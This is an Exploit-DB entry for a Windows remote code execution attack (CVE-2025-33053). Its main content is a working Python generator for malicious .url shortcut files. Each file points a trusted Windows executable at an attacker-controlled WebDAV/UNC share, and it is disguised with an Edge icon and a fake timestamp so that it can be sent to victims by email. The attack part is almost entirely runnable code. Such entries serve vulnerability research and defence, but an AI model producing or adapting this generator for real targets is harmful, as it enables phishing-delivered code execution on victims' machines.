WebDAV Windows 10 - Remote Code Execution (RCE)

EDB-ID:

52334

CVE:

N/A

EDB Verified:

Author:

Dev Bui Hieu

Type:

remote

Exploit:   /  

Platform:

Windows

Date:

2025-06-15

Vulnerable App: 
Exploit Title: WebDAV Windows 10 - Remote Code Execution (RCE)
Date: June 2025
Author: Dev Bui Hieu
Tested on: Windows 10, Windows 11
Platform: Windows
Type: Remote
CVE: CVE-2025-33053

Description:
This exploit leverages the behavior of Windows .URL files to execute a
remote binary over a UNC path. When a victim opens or previews the .URL
file (e.g. from email), the system may automatically reach out to the
specified path (e.g. WebDAV or SMB share), leading to arbitrary code
execution without prompt.

```bash
python3 gen_url.py --ip 192.168.1.100 --out doc.url
```

import argparse

def generate_url_file(output_file, url_target, working_directory, icon_file, icon_index, modified):
    content = f"""[InternetShortcut]
URL={url_target}
WorkingDirectory={working_directory}
ShowCommand=7
IconIndex={icon_index}
IconFile={icon_file}
Modified={modified}
"""
    with open(output_file, "w", encoding="utf-8") as f:
        f.write(content)
    print(f"[+] .url file created: {output_file}")

def main():
    parser = argparse.ArgumentParser(description="Generate a malicious .url file (UNC/WebDAV shortcut)")
    
    parser.add_argument('--out', default="bait.url", help="Output .url file name")
    parser.add_argument('--ip', required=True, help="Attacker IP address or domain name for UNC/WebDAV path")
    parser.add_argument('--share', default="webdav", help="Shared folder name (default: webdav)")
    parser.add_argument('--exe', default=r"C:\Program Files\Internet Explorer\iediagcmd.exe",
                        help="Target executable path on victim machine")
    parser.add_argument('--icon', default=r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
                        help="Icon file path")
    parser.add_argument('--index', type=int, default=13, help="Icon index (default: 13)")
    parser.add_argument('--modified', default="20F06BA06D07BD014D", help="Fake Modified timestamp (hex string)")

    args = parser.parse_args()

    working_directory = fr"\\{args.ip}\{args.share}\\"

    generate_url_file(
        output_file=args.out,
        url_target=args.exe,
        working_directory=working_directory,
        icon_file=args.icon,
        icon_index=args.index,
        modified=args.modified
    )

if __name__ == "__main__":
    main()
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services